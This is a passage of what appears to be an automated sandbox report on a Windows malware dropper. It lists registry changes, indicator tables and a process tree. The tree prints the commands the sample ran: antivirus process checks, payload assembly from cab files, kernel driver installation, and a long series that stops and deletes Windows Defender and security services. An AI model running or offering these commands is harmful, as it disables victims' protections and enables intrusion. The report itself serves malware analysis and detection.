8cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	rapes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rapes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rapes.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
908	schtasks.exe
2020	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2540	11.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
2780	rapes.exe
2068	Passwords.com
2068	Passwords.com
2068	Passwords.com
2852	Exam.com
2852	Exam.com
2852	Exam.com
2068	Passwords.com
2068	Passwords.com
2068	Passwords.com
2068	Passwords.com
1688	cdfca381b2.exe
1688	cdfca381b2.exe
1688	cdfca381b2.exe
1688	cdfca381b2.exe
1688	cdfca381b2.exe
2852	Exam.com
2852	Exam.com
2852	Exam.com
2852	Exam.com
2012	Exam.com
2012	Exam.com
2012	Exam.com
2012	Exam.com
2724	Exam.com
2724	Exam.com
2724	Exam.com
2308	msiexec.exe
2308	msiexec.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
2176	BIm18E9.exe
2724	Exam.com
2724	Exam.com
2724	Exam.com
2724	Exam.com
1236	Exam.com
1236	Exam.com
1236	Exam.com
1236	Exam.com
1464	5c58648e92.exe
2660	7cec070324.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
1612	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
2968	powershell.exe
2872	powershell.exe
2492	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1984	Exam.com
1984	Exam.com
1984	Exam.com
2852	483d2fa8a0d53818306efeb32d3.exe
2488	Exam.com
2488	Exam.com
2488	Exam.com

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
472	Process not Found
472	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	tasklist.exe
Token: SeDebugPrivilege	1216	tasklist.exe
Token: SeDebugPrivilege	1676	tasklist.exe
Token: SeDebugPrivilege	2472	tasklist.exe
Token: SeDebugPrivilege	1580	tool.exe
Token: SeShutdownPrivilege	2224	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2224	msiexec.exe
Token: SeRestorePrivilege	2308	msiexec.exe
Token: SeTakeOwnershipPrivilege	2308	msiexec.exe
Token: SeSecurityPrivilege	2308	msiexec.exe
Token: SeCreateTokenPrivilege	2224	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2224	msiexec.exe
Token: SeLockMemoryPrivilege	2224	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2224	msiexec.exe
Token: SeMachineAccountPrivilege	2224	msiexec.exe
Token: SeTcbPrivilege	2224	msiexec.exe
Token: SeSecurityPrivilege	2224	msiexec.exe
Token: SeTakeOwnershipPrivilege	2224	msiexec.exe
Token: SeLoadDriverPrivilege	2224	msiexec.exe
Token: SeSystemProfilePrivilege	2224	msiexec.exe
Token: SeSystemtimePrivilege	2224	msiexec.exe
Token: SeProfSingleProcessPrivilege	2224	msiexec.exe
Token: SeIncBasePriorityPrivilege	2224	msiexec.exe
Token: SeCreatePagefilePrivilege	2224	msiexec.exe
Token: SeCreatePermanentPrivilege	2224	msiexec.exe
Token: SeBackupPrivilege	2224	msiexec.exe
Token: SeRestorePrivilege	2224	msiexec.exe
Token: SeShutdownPrivilege	2224	msiexec.exe
Token: SeDebugPrivilege	2224	msiexec.exe
Token: SeAuditPrivilege	2224	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2224	msiexec.exe
Token: SeChangeNotifyPrivilege	2224	msiexec.exe
Token: SeRemoteShutdownPrivilege	2224	msiexec.exe
Token: SeUndockPrivilege	2224	msiexec.exe
Token: SeSyncAgentPrivilege	2224	msiexec.exe
Token: SeEnableDelegationPrivilege	2224	msiexec.exe
Token: SeManageVolumePrivilege	2224	msiexec.exe
Token: SeImpersonatePrivilege	2224	msiexec.exe
Token: SeCreateGlobalPrivilege	2224	msiexec.exe
Token: SeCreateTokenPrivilege	2224	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2224	msiexec.exe
Token: SeLockMemoryPrivilege	2224	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2224	msiexec.exe
Token: SeMachineAccountPrivilege	2224	msiexec.exe
Token: SeTcbPrivilege	2224	msiexec.exe
Token: SeSecurityPrivilege	2224	msiexec.exe
Token: SeTakeOwnershipPrivilege	2224	msiexec.exe
Token: SeLoadDriverPrivilege	2224	msiexec.exe
Token: SeSystemProfilePrivilege	2224	msiexec.exe
Token: SeSystemtimePrivilege	2224	msiexec.exe
Token: SeProfSingleProcessPrivilege	2224	msiexec.exe
Token: SeIncBasePriorityPrivilege	2224	msiexec.exe
Token: SeCreatePagefilePrivilege	2224	msiexec.exe
Token: SeCreatePermanentPrivilege	2224	msiexec.exe
Token: SeBackupPrivilege	2224	msiexec.exe
Token: SeRestorePrivilege	2224	msiexec.exe
Token: SeShutdownPrivilege	2224	msiexec.exe
Token: SeDebugPrivilege	2224	msiexec.exe
Token: SeAuditPrivilege	2224	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2224	msiexec.exe
Token: SeChangeNotifyPrivilege	2224	msiexec.exe
Token: SeRemoteShutdownPrivilege	2224	msiexec.exe
Token: SeUndockPrivilege	2224	msiexec.exe
Token: SeSyncAgentPrivilege	2224	msiexec.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
2068	Passwords.com
2068	Passwords.com
2068	Passwords.com
2852	Exam.com
2852	Exam.com
2852	Exam.com
2224	msiexec.exe
2724	Exam.com
2724	Exam.com
2724	Exam.com
2224	msiexec.exe
2716	b66824f2c4.exe
2716	b66824f2c4.exe
2716	b66824f2c4.exe
1984	Exam.com
1984	Exam.com
1984	Exam.com
2488	Exam.com
2488	Exam.com
2488	Exam.com
2124	Passwords.com
2124	Passwords.com
2124	Passwords.com
1680	chrome.exe

Suspicious use of SendNotifyMessage 21 IoCs

pid	Process
2068	Passwords.com
2068	Passwords.com
2068	Passwords.com
2852	Exam.com
2852	Exam.com
2852	Exam.com
2724	Exam.com
2724	Exam.com
2724	Exam.com
2716	b66824f2c4.exe
2716	b66824f2c4.exe
2716	b66824f2c4.exe
1984	Exam.com
1984	Exam.com
1984	Exam.com
2488	Exam.com
2488	Exam.com
2488	Exam.com
2124	Passwords.com
2124	Passwords.com
2124	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2204 wrote to memory of 2780	2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe	31
PID 2204 wrote to memory of 2780	2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe	31
PID 2204 wrote to memory of 2780	2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe	31
PID 2204 wrote to memory of 2780	2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe	31
PID 2780 wrote to memory of 2960	2780	rapes.exe	33
PID 2780 wrote to memory of 2960	2780	rapes.exe	33
PID 2780 wrote to memory of 2960	2780	rapes.exe	33
PID 2780 wrote to memory of 2960	2780	rapes.exe	33
PID 2780 wrote to memory of 1244	2780	rapes.exe	34
PID 2780 wrote to memory of 1244	2780	rapes.exe	34
PID 2780 wrote to memory of 1244	2780	rapes.exe	34
PID 2780 wrote to memory of 1244	2780	rapes.exe	34
PID 1244 wrote to memory of 2948	1244	7IIl2eE.exe	35
PID 1244 wrote to memory of 2948	1244	7IIl2eE.exe	35
PID 1244 wrote to memory of 2948	1244	7IIl2eE.exe	35
PID 1244 wrote to memory of 2948	1244	7IIl2eE.exe	35
PID 2948 wrote to memory of 852	2948	CMD.exe	37
PID 2948 wrote to memory of 852	2948	CMD.exe	37
PID 2948 wrote to memory of 852	2948	CMD.exe	37
PID 2948 wrote to memory of 852	2948	CMD.exe	37
PID 2948 wrote to memory of 396	2948	CMD.exe	38
PID 2948 wrote to memory of 396	2948	CMD.exe	38
PID 2948 wrote to memory of 396	2948	CMD.exe	38
PID 2948 wrote to memory of 396	2948	CMD.exe	38
PID 2948 wrote to memory of 1216	2948	CMD.exe	40
PID 2948 wrote to memory of 1216	2948	CMD.exe	40
PID 2948 wrote to memory of 1216	2948	CMD.exe	40
PID 2948 wrote to memory of 1216	2948	CMD.exe	40
PID 2948 wrote to memory of 1676	2948	CMD.exe	41
PID 2948 wrote to memory of 1676	2948	CMD.exe	41
PID 2948 wrote to memory of 1676	2948	CMD.exe	41
PID 2948 wrote to memory of 1676	2948	CMD.exe	41
PID 2948 wrote to memory of 864	2948	CMD.exe	42
PID 2948 wrote to memory of 864	2948	CMD.exe	42
PID 2948 wrote to memory of 864	2948	CMD.exe	42
PID 2948 wrote to memory of 864	2948	CMD.exe	42
PID 2948 wrote to memory of 2308	2948	CMD.exe	43
PID 2948 wrote to memory of 2308	2948	CMD.exe	43
PID 2948 wrote to memory of 2308	2948	CMD.exe	43
PID 2948 wrote to memory of 2308	2948	CMD.exe	43
PID 2948 wrote to memory of 2648	2948	CMD.exe	44
PID 2948 wrote to memory of 2648	2948	CMD.exe	44
PID 2948 wrote to memory of 2648	2948	CMD.exe	44
PID 2948 wrote to memory of 2648	2948	CMD.exe	44
PID 2948 wrote to memory of 1464	2948	CMD.exe	45
PID 2948 wrote to memory of 1464	2948	CMD.exe	45
PID 2948 wrote to memory of 1464	2948	CMD.exe	45
PID 2948 wrote to memory of 1464	2948	CMD.exe	45
PID 2948 wrote to memory of 2284	2948	CMD.exe	46
PID 2948 wrote to memory of 2284	2948	CMD.exe	46
PID 2948 wrote to memory of 2284	2948	CMD.exe	46
PID 2948 wrote to memory of 2284	2948	CMD.exe	46
PID 2948 wrote to memory of 2068	2948	CMD.exe	47
PID 2948 wrote to memory of 2068	2948	CMD.exe	47
PID 2948 wrote to memory of 2068	2948	CMD.exe	47
PID 2948 wrote to memory of 2068	2948	CMD.exe	47
PID 2948 wrote to memory of 2848	2948	CMD.exe	48
PID 2948 wrote to memory of 2848	2948	CMD.exe	48
PID 2948 wrote to memory of 2848	2948	CMD.exe	48
PID 2948 wrote to memory of 2848	2948	CMD.exe	48
PID 2780 wrote to memory of 2396	2780	rapes.exe	49
PID 2780 wrote to memory of 2396	2780	rapes.exe	49
PID 2780 wrote to memory of 2396	2780	rapes.exe	49
PID 2780 wrote to memory of 2396	2780	rapes.exe	49

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1188
- C:\Users\Admin\AppData\Local\Temp\84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
  "C:\Users\Admin\AppData\Local\Temp\84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
      "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
      4⤵
      Executes dropped EXE
      PID:2960
  - - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
      "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:1244
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2948
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:852
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:396
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1676
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:864
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        6⤵
        
        PID:2308
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        6⤵
        
        PID:2648
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        6⤵
        
        PID:1464
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2284
      - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2068
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
      "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2396
    - - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2988
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FFF.tmp\2000.tmp\2001.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        6⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        7⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2540
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\203D.tmp\203E.tmp\203F.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        8⤵
        Drops file in Program Files directory
        
        PID:2124
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        9⤵
        Launches sc.exe
        
        PID:1724
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        9⤵
        Launches sc.exe
        
        PID:772
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        9⤵
        Delays execution with timeout.exe
        
        PID:540
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        9⤵
        Launches sc.exe
        
        PID:2552
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        9⤵
        Launches sc.exe
        
        PID:2464
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2104
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:272
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        9⤵
        Launches sc.exe
        
        PID:2992
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        9⤵
        Launches sc.exe
        
        PID:2460
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        9⤵
        
        PID:1980
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        9⤵
        Launches sc.exe
        
        PID:948
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        9⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        9⤵
        
        PID:1072
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        9⤵
        Launches sc.exe
        
        PID:1288
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        9⤵
        Launches sc.exe
        
        PID:1668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        9⤵
        
        PID:3056
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        9⤵
        Launches sc.exe
        
        PID:1664
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        9⤵
        Launches sc.exe
        
        PID:1684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        9⤵
        
        PID:760
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        9⤵
        Launches sc.exe
        
        PID:1944
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        9⤵
        Launches sc.exe
        
        PID:2180
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        9⤵
        
        PID:2868
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        9⤵
        Launches sc.exe
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        9⤵
        Launches sc.exe
        
        PID:1624
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        9⤵
        
        PID:1048
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        9⤵
        Launches sc.exe
        
        PID:1564
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        9⤵
        Launches sc.exe
        
        PID:1752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        9⤵
        
        PID:396
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        9⤵
        Launches sc.exe
        
        PID:2544
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        9⤵
        Launches sc.exe
        
        PID:1892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        9⤵
        
        PID:1468
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        9⤵
        Launches sc.exe
        
        PID:1504
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        9⤵
        Launches sc.exe
        
        PID:2304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        9⤵
        
        PID:2420
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        9⤵
        Launches sc.exe
        
        PID:3064
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        9⤵
        Launches sc.exe
        
        PID:1556
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        9⤵
        
        PID:676
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        9⤵
        Launches sc.exe
        
        PID:2156
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        9⤵
        Launches sc.exe
        
        PID:1552
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        9⤵
        
        PID:1652
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        9⤵
        Launches sc.exe
        
        PID:1760
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        9⤵
        Launches sc.exe
        
        PID:864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        9⤵
        
        PID:1976
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        9⤵
        Launches sc.exe
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        9⤵
        Launches sc.exe
        
        PID:2508
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        9⤵
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        9⤵
        Launches sc.exe
        
        PID:1580
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        9⤵
        Launches sc.exe
        
        PID:1948
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        9⤵
        
        PID:2384
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        9⤵
        Launches sc.exe
        
        PID:788
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        9⤵
